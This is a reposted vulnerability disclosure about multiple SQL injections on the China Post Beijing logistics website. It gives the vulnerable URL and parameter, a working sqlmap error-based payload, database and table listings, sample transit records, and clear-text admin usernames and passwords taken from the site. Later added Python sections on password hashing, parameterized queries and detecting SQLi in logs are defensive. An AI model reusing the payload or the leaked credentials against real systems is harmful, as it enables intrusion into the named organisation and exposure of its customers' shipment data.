神刀安全网

Vulnerability title: Multiple SQL injections on a site of China Post Beijing Branch (over one million transit records)

Vulnerability details

Disclosure status:

2016-04-09: Details reported to the vendor, awaiting vendor handling
2016-04-09: Vendor has confirmed; details visible to the vendor only
2016-04-19: Details disclosed to core white hats and domain experts
2016-04-29: Details disclosed to regular white hats
2016-05-09: Details disclosed to intern white hats
2016-05-24: Details disclosed to the public

Brief description:

SQL injection in multiple places

Detailed description:

Code:
http://www.bj-cnpl.com

China Postal Express & Logistics Co., Ltd., Beijing Branch (中国邮政速递物流股份有限公司北京市分公司)

The system has SQL injection in several places, leaking waybill information

Code:
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1


The orderno parameter is injectable

Code:
current user:    'cnpluser'

Code:
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] AT
[*] ATRACK
[*] master
[*] model
[*] msdb
[*] tempdb

Code:
Database: ATRACK
[19 tables]
+---------------------+
| CNPL_DNJ_REDOC |
| Logistic_DNJ |
| Logistic_POD_Status |
| Logistic_Russia |
| Logistic_Shipment |
| Logistic_State |
| Logistic_Upload_D |
| Logistic_Upload_I |
| Logistic_Upload_M |
| Logistic_User |
| MAN_DT |
| MAN_HD |
| atrackdssw21 |
| atrackdssw22 |
| atrackdssw23 |
| atrackdssw24 |
| atrackdssw25 |
| sysdiagrams |
| 中邮与俄方状态对照表|
+---------------------+

Code:
Database: ATRACK
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.Logistic_State | 1641873 | (transit records)
| dbo.CNPL_DNJ_REDOC | 348257 |
| dbo.Logistic_Upload_I | 1259 |
| dbo.Logistic_Upload_M | 1237 |
| dbo.Logistic_Shipment | 941 |
| dbo.Logistic_POD_Status | 47 |
| dbo.Logistic_Russia | 23 |
| dbo.MAN_DT | 17 |
| dbo.Logistic_User | 11 |
| dbo.Logistic_Upload_D | 6 |
| dbo.MAN_HD | 6 |
| dbo.Logistic_DNJ | 1 |
+-------------------------+---------+

Code:
Table: Logistic_State
[3 entries]
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| 10000 | BPIL870050205 | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心 | admin | Arrived on an airport warehouse | Moscow, Russia | 11 10 2012 3:00PM | <blank> | <blank> | STA 56 |
| 100000 | CT287578855CN | 02 27 2014 9:06AM | Shipment Out of Delivery | 快件外出派送 | admin | <blank> | CANADA | 02 26 2014 12:19PM | <blank> | <blank> | SH003 |
| 1000000 | 98723A925 | 09 22 2015 8:25AM | Shipment forwarded | 快件转运 | admin | <blank> | 东莞 | 09 22 2015 6:57AM | <blank> | <blank> | SH272 |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+

Proof of vulnerability:

User passwords are stored unencrypted

Code:
+------------------+--------------------+---------------------+-----------------------+------------------------+
| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
+------------------+--------------------+---------------------+-----------------------+------------------------+
| 1 | admin | ADMIN | YES | lzyouzheng |
| 10 | emskf | ADMIN | YES | kefuzhongxin |
| 11 | guoji | ADMIN | YES | guojifengongsi |
+------------------+--------------------+---------------------+-----------------------+------------------------+
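The Logistic_User dump above keeps every password in clear text, so one injection point exposes working admin logins. As an added example (not the site's code and not part of the original report), the Python below shows the storage that table should have used: a per-user random salt, PBKDF2-HMAC-SHA256, a self-describing stored record, constant-time verification, and a one-off migration of a plaintext table. The user names, passwords and iteration count are constructed for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor; raise it as hardware allows


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt_hex$hash_hex."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per user, so equal passwords differ
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(stored, candidate):
    """Recompute with the stored salt and iterations; compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False  # legacy or malformed record: never accept it
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)


# Constructed stand-in for a Logistic_User-style table with clear-text passwords.
PLAINTEXT_USERS = [
    {"Logistic_User_ID": 1, "Logistic_User_Name": "alice", "Logistic_User_Password": "example-pass-1"},
    {"Logistic_User_ID": 2, "Logistic_User_Name": "bob", "Logistic_User_Password": "example-pass-2"},
]


def migrate_plaintext_users(users):
    """One-off migration: replace every clear-text password with its hash record."""
    migrated = []
    for user in users:
        row = dict(user)
        row["Logistic_User_Password"] = hash_password(user["Logistic_User_Password"])
        migrated.append(row)
    return migrated


def login(users, name, candidate):
    """Authenticate against the migrated table; return the user ID or None."""
    for user in users:
        if user["Logistic_User_Name"] == name and verify_password(user["Logistic_User_Password"], candidate):
            return user["Logistic_User_ID"]
    return None


if __name__ == "__main__":
    table = migrate_plaintext_users(PLAINTEXT_USERS)
    print(table[0]["Logistic_User_Password"])
    print(login(table, "alice", "example-pass-1"), login(table, "alice", "wrong"))
```

After such a migration a dumped table yields only salted hashes, and the record format lets the iteration count be raised later without invalidating existing rows.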

After logging into the back end, it turns out the back end has SQL injection as well

When adding a new status, enter a single quote (')

[Screenshots of the back-end injection result (three images, not preserved in this copy)]

Two other places

[Screenshots of the two other injection points (two images, not preserved in this copy)]
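Both the orderno lookup on showstate.asp and the back-end "add status" form fail the same way: the request value is pasted into the SQL text, so a single quote breaks the statement and an OR clause changes what it returns. As an added example (not the site's code and not part of the original report), the Python below puts that concatenated lookup beside the parameterized one, adds an allow-list check on the waybill format, and runs a small detector over constructed IIS-style log lines for the single-quote and CONVERT/CHAR pattern seen in the sqlmap output above. SQLite in memory, the column subset, the waybill regex, the log layout and all sample rows are assumptions for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed rows standing in for the report's Logistic_State table; SQLite in
# memory is assumed here in place of the site's SQL Server 2005 back end.
SAMPLE_ROWS = [
    (1, "TEST000001CN", "Shipment forwarded", "Beijing"),
    (2, "TEST000002JP", "Arrived on an airport warehouse", "Tokyo"),
    (3, "TEST000003RU", "Shipment Out of Delivery", "Moscow"),
]
COLUMNS = "Logistic_State_No, Logistic_State_Eng, Logistic_State_City"


def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Logistic_State (Logistic_State_ID INTEGER, "
                 "Logistic_State_No TEXT, Logistic_State_Eng TEXT, Logistic_State_City TEXT)")
    conn.executemany("INSERT INTO Logistic_State VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, orderno):
    # The pattern behind showstate.asp?orderno= and the back-end status form:
    # the request value becomes part of the SQL text itself.
    sql = "SELECT %s FROM Logistic_State WHERE Logistic_State_No = '%s'" % (COLUMNS, orderno)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, orderno):
    # The driver binds the value, so quotes and keywords inside it stay data.
    sql = "SELECT %s FROM Logistic_State WHERE Logistic_State_No = ?" % COLUMNS
    return conn.execute(sql, (orderno,)).fetchall()


# Assumed waybill format: letters and digits only, e.g. CI065580410JP.
ORDERNO_RE = re.compile(r"^[A-Za-z0-9]{5,20}$")


def is_valid_orderno(orderno):
    return bool(ORDERNO_RE.match(orderno))


def lookup_safe(conn, orderno):
    # Defence in depth: reject anything outside the allow-list, then bind.
    if not is_valid_orderno(orderno):
        return []
    return lookup_parameterized(conn, orderno)


def probe(lookup, conn, orderno):
    """Run a lookup and describe the outcome without raising (for the demo and tests)."""
    try:
        return "rows:%d" % len(lookup(conn, orderno))
    except sqlite3.Error as exc:
        return "error:" + type(exc).__name__


# Constructed, simplified IIS W3C-style lines: date time method uri-stem uri-query status.
SAMPLE_LOG = """\
2016-04-09 10:00:01 GET /showstate.asp orderno=CI065580410JP&x=38&y=1 200
2016-04-09 10:00:07 GET /showstate.asp orderno=CI065580410JP'&x=38&y=1 500
2016-04-09 10:00:09 GET /showstate.asp orderno=-3966')+OR+7043%3DCONVERT(INT,(SELECT+CHAR(113)))&x=38&y=1 500
2016-04-09 10:01:30 GET /index.asp - 200
"""
SQLI_MARKERS = re.compile(r"'|CONVERT\s*\(|CHAR\s*\(|\bSELECT\b", re.IGNORECASE)


def flag_suspicious_requests(log_text):
    """Return (timestamp, parameter, decoded value, status) for each request whose
    query carries quote/CONVERT/CHAR/SELECT markers or a malformed orderno."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        timestamp, query, status = fields[0] + " " + fields[1], fields[4], fields[5]
        for name, values in parse_qs(query).items():  # parse_qs URL-decodes and splits
            hit = next((v for v in values
                        if SQLI_MARKERS.search(v)
                        or (name == "orderno" and not is_valid_orderno(v))), None)
            if hit is not None:
                flagged.append((timestamp, name, hit, status))
                break
    return flagged


if __name__ == "__main__":
    db = build_sample_db()
    for value in ("TEST000001CN", "'", "x' OR 'a'='a"):
        print(repr(value), probe(lookup_vulnerable, db, value), probe(lookup_safe, db, value))
    for hit in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

Running the block shows the concatenated lookup erroring on a lone quote and returning every row for a tautology, while the bound query returns nothing for either; the log scan flags the two probing requests and nothing else. In the site's own classic ASP the equivalent of the bound query is an ADODB.Command with a parameter rather than a string built into an ADODB.Recordset.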

Fix plan:

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)
